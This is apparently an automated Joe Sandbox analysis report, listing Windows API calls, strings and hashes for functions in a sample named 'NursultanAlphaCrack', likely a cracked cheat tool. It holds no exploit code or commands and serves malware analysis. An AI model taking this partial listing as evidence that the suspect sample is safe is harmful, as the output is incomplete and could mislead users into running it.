                                                                                        • Instruction ID: efb9f4923c315337d13613ea9cddbf722364f0dc196ad5b0d2ff7c522ea982f8
                                                                                        • Opcode Fuzzy Hash: 2e8aa35a86762e570055cfa64c266891d56163dc1289b1fab945b05919b30462
                                                                                        • Instruction Fuzzy Hash: 8741C031248385AAD736DF24DC55FAEBBE4AFA4308F48091DB6E1D3180D7A4DA48DB53
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 176396367-0
                                                                                        • Opcode ID: 438ed003daaf24662782342245bb800e6b491acbc1022be397b3bab7d89fe13c
                                                                                        • Instruction ID: 9245faeb7e45289ac4ec63e2f3f45d00181fc142b1f9d7512f31e603e49320cf
                                                                                        • Opcode Fuzzy Hash: 438ed003daaf24662782342245bb800e6b491acbc1022be397b3bab7d89fe13c
                                                                                        • Instruction Fuzzy Hash: 4741B671940669ABCB25DFA88C09AEE7BB8EF15311F14401EFD45F7242DB34EE458AA0
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,001E91E0,?,00000000,?,00000001,?,?,00000001,001E91E0,?), ref: 001EC9D5
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001ECA5E
                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001E6CBE,?), ref: 001ECA70
                                                                                        • __freea.LIBCMT ref: 001ECA79
                                                                                          • Part of subcall function 001E8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,001ECA2C,00000000,?,001E6CBE,?,00000008,?,001E91E0,?,?,?), ref: 001E8E38
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                        • String ID:
                                                                                        • API String ID: 2652629310-0
                                                                                        • Opcode ID: ae3bc448bbef1abf6b9e34132e6abe6daab58b79db3abc9494401c30be1d02ab
                                                                                        • Instruction ID: a1c43f7c505115a5d72963b642cd1c4e6694c6a832dfad46f1eb9a46e4266f86
                                                                                        • Opcode Fuzzy Hash: ae3bc448bbef1abf6b9e34132e6abe6daab58b79db3abc9494401c30be1d02ab
                                                                                        • Instruction Fuzzy Hash: D731CD32A0064AABDB24DF66CC45DBE7BA5EB81310B044228FC15E7250EB35CD92CBD0
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 001DA666
                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 001DA675
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001DA683
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 001DA691
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$Release
                                                                                        • String ID:
                                                                                        • API String ID: 1035833867-0
                                                                                        • Opcode ID: 92679777c3d6cf4682dbcec768fffe4bc0f4cb1161a6ebf207608afa603aa565
                                                                                        • Instruction ID: 97ee6e69dfe2cd03376abc9a4450286e26dc151dc427f9e09ddd7d49567f6c58
                                                                                        • Opcode Fuzzy Hash: 92679777c3d6cf4682dbcec768fffe4bc0f4cb1161a6ebf207608afa603aa565
                                                                                        • Instruction Fuzzy Hash: CDE0EC31942B21B7D2719BA0BC4DB8B3E54AB05B62F011101FB0596190DF6887018BB5
                                                                                        APIs
                                                                                          • Part of subcall function 001DA699: GetDC.USER32(00000000), ref: 001DA69D
                                                                                          • Part of subcall function 001DA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 001DA6A8
                                                                                          • Part of subcall function 001DA699: ReleaseDC.USER32(00000000,00000000), ref: 001DA6B3
                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 001DA83C
                                                                                          • Part of subcall function 001DAAC9: GetDC.USER32(00000000), ref: 001DAAD2
                                                                                          • Part of subcall function 001DAAC9: GetObjectW.GDI32(?,00000018,?), ref: 001DAB01
                                                                                          • Part of subcall function 001DAAC9: ReleaseDC.USER32(00000000,?), ref: 001DAB99
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectRelease$CapsDevice
                                                                                        • String ID: (
                                                                                        • API String ID: 1061551593-3887548279
                                                                                        • Opcode ID: c6e8ed7edebdb78d4f79dc8fb5412f1bfc676a7122f9dd3a98b11654aae3ac72
                                                                                        • Instruction ID: 515ff2e39732def662d5957db523ebf2c42568129221cd9d3bd2ccb51eb4a2df
                                                                                        • Opcode Fuzzy Hash: c6e8ed7edebdb78d4f79dc8fb5412f1bfc676a7122f9dd3a98b11654aae3ac72
                                                                                        • Instruction Fuzzy Hash: D891E271608354AFD721DF25D84892BBBE9FFC9700F00491EF99AD3260DB30A946CB62
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 001EB324
                                                                                          • Part of subcall function 001E9097: IsProcessorFeaturePresent.KERNEL32(00000017,001E9086,00000050,001F3A34,?,001CD710,00000004,00201030,?,?,001E9093,00000000,00000000,00000000,00000000,00000000), ref: 001E9099
                                                                                          • Part of subcall function 001E9097: GetCurrentProcess.KERNEL32(C0000417,001F3A34,00000050,00201030), ref: 001E90BB
                                                                                          • Part of subcall function 001E9097: TerminateProcess.KERNEL32(00000000), ref: 001E90C2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                        • String ID: *?$.
                                                                                        • API String ID: 2667617558-3972193922
                                                                                        • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                        • Instruction ID: e3c82e1c070e813c388922f59460cad5451a47acc6c9aac80a3c397cb8b5de91
                                                                                        • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                        • Instruction Fuzzy Hash: D3519071E0464AAFDF14DFAAC881AAEBBB5FF58310F244169E954E7340E735AE01CB50
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 001C75E3
                                                                                          • Part of subcall function 001D05DA: _wcslen.LIBCMT ref: 001D05E0
                                                                                          • Part of subcall function 001CA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 001CA598
                                                                                        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001C777F
                                                                                          • Part of subcall function 001CA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001CA325,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA501
                                                                                          • Part of subcall function 001CA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001CA325,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA532
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                        • String ID: :
                                                                                        • API String ID: 3226429890-336475711
                                                                                        • Opcode ID: 1bed97c80ec5656039a63d2453fd6eb87243cd99ff100f19e6a52782872da29f
                                                                                        • Instruction ID: 699f904bb74f05090f3169edd01dcb017fc56814048814ba277688f7d81f387f
                                                                                        • Opcode Fuzzy Hash: 1bed97c80ec5656039a63d2453fd6eb87243cd99ff100f19e6a52782872da29f
                                                                                        • Instruction Fuzzy Hash: 97416471800258A9EB25EB64CC5AFEEB37CAF75300F40409AB605A7192DB749F85CF71
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID: }
                                                                                        • API String ID: 176396367-4239843852
                                                                                        • Opcode ID: 031de28fcb3a251b013047d51d8e8e851fb1065ad5298f43c7cb69bf997b2b38
                                                                                        • Instruction ID: 5f3b45932d43f96ef03088f496dd4dde9d08701a7e248de3fbda7abc3edb0496
                                                                                        • Opcode Fuzzy Hash: 031de28fcb3a251b013047d51d8e8e851fb1065ad5298f43c7cb69bf997b2b38
                                                                                        • Instruction Fuzzy Hash: FF2108729093569AD731EA64E885F6FB3ECDF61750F02042BF542C3341E764DD4883A2
                                                                                        APIs
                                                                                        • DialogBoxParamW.USER32(GETPASSWORD1,00010440,001DB270,?,?), ref: 001DDE18
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: DialogParam
                                                                                        • String ID: GETPASSWORD1$xz!
                                                                                        • API String ID: 665744214-1603523493
                                                                                        • Opcode ID: 1ee91e08fb369ef9e5b9aa41d4a02b0279e270d94ea5594a589b2d86a66cdf95
                                                                                        • Instruction ID: bafe8238205f1e36a49225e3a762fc5df78b6489642d92567e7ef4bdc1e54511
                                                                                        • Opcode Fuzzy Hash: 1ee91e08fb369ef9e5b9aa41d4a02b0279e270d94ea5594a589b2d86a66cdf95
                                                                                        • Instruction Fuzzy Hash: A2113B72204244AADF21DA34BC05BAF3798AB15311F144035FE45AB1C1C7B4AD84C764
                                                                                        APIs
                                                                                          • Part of subcall function 001CF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 001CF2E4
                                                                                          • Part of subcall function 001CF2C5: GetProcAddress.KERNEL32(002081C8,CryptUnprotectMemory), ref: 001CF2F4
                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,001CF33E), ref: 001CF3D2
                                                                                        Strings
                                                                                        • CryptUnprotectMemory failed, xrefs: 001CF3CA
                                                                                        • CryptProtectMemory failed, xrefs: 001CF389
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CurrentProcess
                                                                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                        • API String ID: 2190909847-396321323
                                                                                        • Opcode ID: 0c7669f2219023fff5eadbcef6234aff1c30e94dad4fdfcc9a66134bb858c546
                                                                                        • Instruction ID: 844afd1f40c72b8f885c6210b1574c36cc4d13ba2d03f6eb13be0a2b9477aff1
                                                                                        • Opcode Fuzzy Hash: 0c7669f2219023fff5eadbcef6234aff1c30e94dad4fdfcc9a66134bb858c546
                                                                                        • Instruction Fuzzy Hash: E011E131600769BBDB159B20D845F7E3B56FF24B20B04416EFC955B292DB30DE42C695
                                                                                        APIs
                                                                                        • _swprintf.LIBCMT ref: 001CB9B8
                                                                                          • Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: __vswprintf_c_l_swprintf
                                                                                        • String ID: %c:\
                                                                                        • API String ID: 1543624204-3142399695
                                                                                        • Opcode ID: 4d7d5a2b424d9f4ce729193218ecbb9be8eb7570082fb1cae0e009ff3e17ef7a
                                                                                        • Instruction ID: ce9ccbee3e8ed7bd3cfb59ee4d97bd09ffa5ddcbf133a5da6ef90396cb18fb29
                                                                                        • Opcode Fuzzy Hash: 4d7d5a2b424d9f4ce729193218ecbb9be8eb7570082fb1cae0e009ff3e17ef7a
                                                                                        • Instruction Fuzzy Hash: 3801F963508752A5DA346B768CC7E6FB79CEEB17B0F40440EF594D7082EB30D45082B1
                                                                                        APIs
                                                                                        • CreateThread.KERNEL32(00000000,00010000,001D1160,?,00000000,00000000), ref: 001D1043
                                                                                        • SetThreadPriority.KERNEL32(?,00000000), ref: 001D108A
                                                                                          • Part of subcall function 001C6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C6C54
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                        • String ID: CreateThread failed
                                                                                        • API String ID: 2655393344-3849766595
                                                                                        • Opcode ID: 96e8b72d334db39f78f86fec1a0d64c9530e397058280d46f0bccfc736d41335
                                                                                        • Instruction ID: 4cfec1eadc514d764ff58ff648100b1f69d4fe10a8d0143080631afb0a30cc63
                                                                                        • Opcode Fuzzy Hash: 96e8b72d334db39f78f86fec1a0d64c9530e397058280d46f0bccfc736d41335
                                                                                        • Instruction Fuzzy Hash: 9F01D6B53443097BD3306E64AC51FB6B399EB61751F20002FFA86522C5CFA1A8948624
                                                                                        APIs
                                                                                          • Part of subcall function 001CE2E8: _swprintf.LIBCMT ref: 001CE30E
                                                                                          • Part of subcall function 001CE2E8: _strlen.LIBCMT ref: 001CE32F
                                                                                          • Part of subcall function 001CE2E8: SetDlgItemTextW.USER32(?,001FE274,?), ref: 001CE38F
                                                                                          • Part of subcall function 001CE2E8: GetWindowRect.USER32(?,?), ref: 001CE3C9
                                                                                          • Part of subcall function 001CE2E8: GetClientRect.USER32(?,?), ref: 001CE3D5
                                                                                        • GetDlgItem.USER32(00000000,00003021), ref: 001C135A
                                                                                        • SetWindowTextW.USER32(00000000,001F35F4), ref: 001C1370
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                        • String ID: 0
                                                                                        • API String ID: 2622349952-4108050209
                                                                                        • Opcode ID: e25de15c0ce7ff4f9b2ebb3bff940f11f82261ff921fa6ce1a51c477ca431b39
                                                                                        • Instruction ID: 8d55673a50e94618261a1f39d6fe75077b8eed3b5cc6c51b03491463789e472b
                                                                                        • Opcode Fuzzy Hash: e25de15c0ce7ff4f9b2ebb3bff940f11f82261ff921fa6ce1a51c477ca431b39
                                                                                        • Instruction Fuzzy Hash: D3F081301843C8B6EF154F60980DFA93B99BB6135CF045119FC88515A2CB78C9A1DA60
                                                                                        APIs
                                                                                          • Part of subcall function 001EBF30: GetEnvironmentStringsW.KERNEL32 ref: 001EBF39
                                                                                          • Part of subcall function 001EBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001EBF5C
                                                                                          • Part of subcall function 001EBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001EBF82
                                                                                          • Part of subcall function 001EBF30: _free.LIBCMT ref: 001EBF95
                                                                                          • Part of subcall function 001EBF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001EBFA4
                                                                                        • _free.LIBCMT ref: 001E82AE
                                                                                        • _free.LIBCMT ref: 001E82B5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                        • String ID: 0""
                                                                                        • API String ID: 400815659-2851617606
                                                                                        • Opcode ID: 05f89ab1f82bebde03fac7e5625a4b7f39d1a40b4f9510e021d0576fa9316774
                                                                                        • Instruction ID: 80b55a6153a4d7ced137aea94dc1ebc2be174246f86ae77513168d3d7174123d
                                                                                        • Opcode Fuzzy Hash: 05f89ab1f82bebde03fac7e5625a4b7f39d1a40b4f9510e021d0576fa9316774
                                                                                        • Instruction Fuzzy Hash: 5BE0ED23A1ADD3A1A36932BB3C4262F06004BA1338B190326FA288B0C3CF51880684A2
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,001D1206,?), ref: 001D0FEA
                                                                                        • GetLastError.KERNEL32(?), ref: 001D0FF6
                                                                                          • Part of subcall function 001C6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C6C54
                                                                                        Strings
                                                                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 001D0FFF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                        • API String ID: 1091760877-2248577382
                                                                                        • Opcode ID: d9d97cc1b8e9da9bafb96f4fccbc318b0f60ec4b96565ca012065bec481f6f0f
                                                                                        • Instruction ID: 5f3e32f69a13f1b117a98b01b3252abdca7bcaab3dbd631ef7083727aed9ac27
                                                                                        • Opcode Fuzzy Hash: d9d97cc1b8e9da9bafb96f4fccbc318b0f60ec4b96565ca012065bec481f6f0f
                                                                                        • Instruction Fuzzy Hash: F1D02B7150413037C71033246C05DBF38049B32731B100719F138502E6CF104AD18295
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,001CDA55,?), ref: 001CE2A3
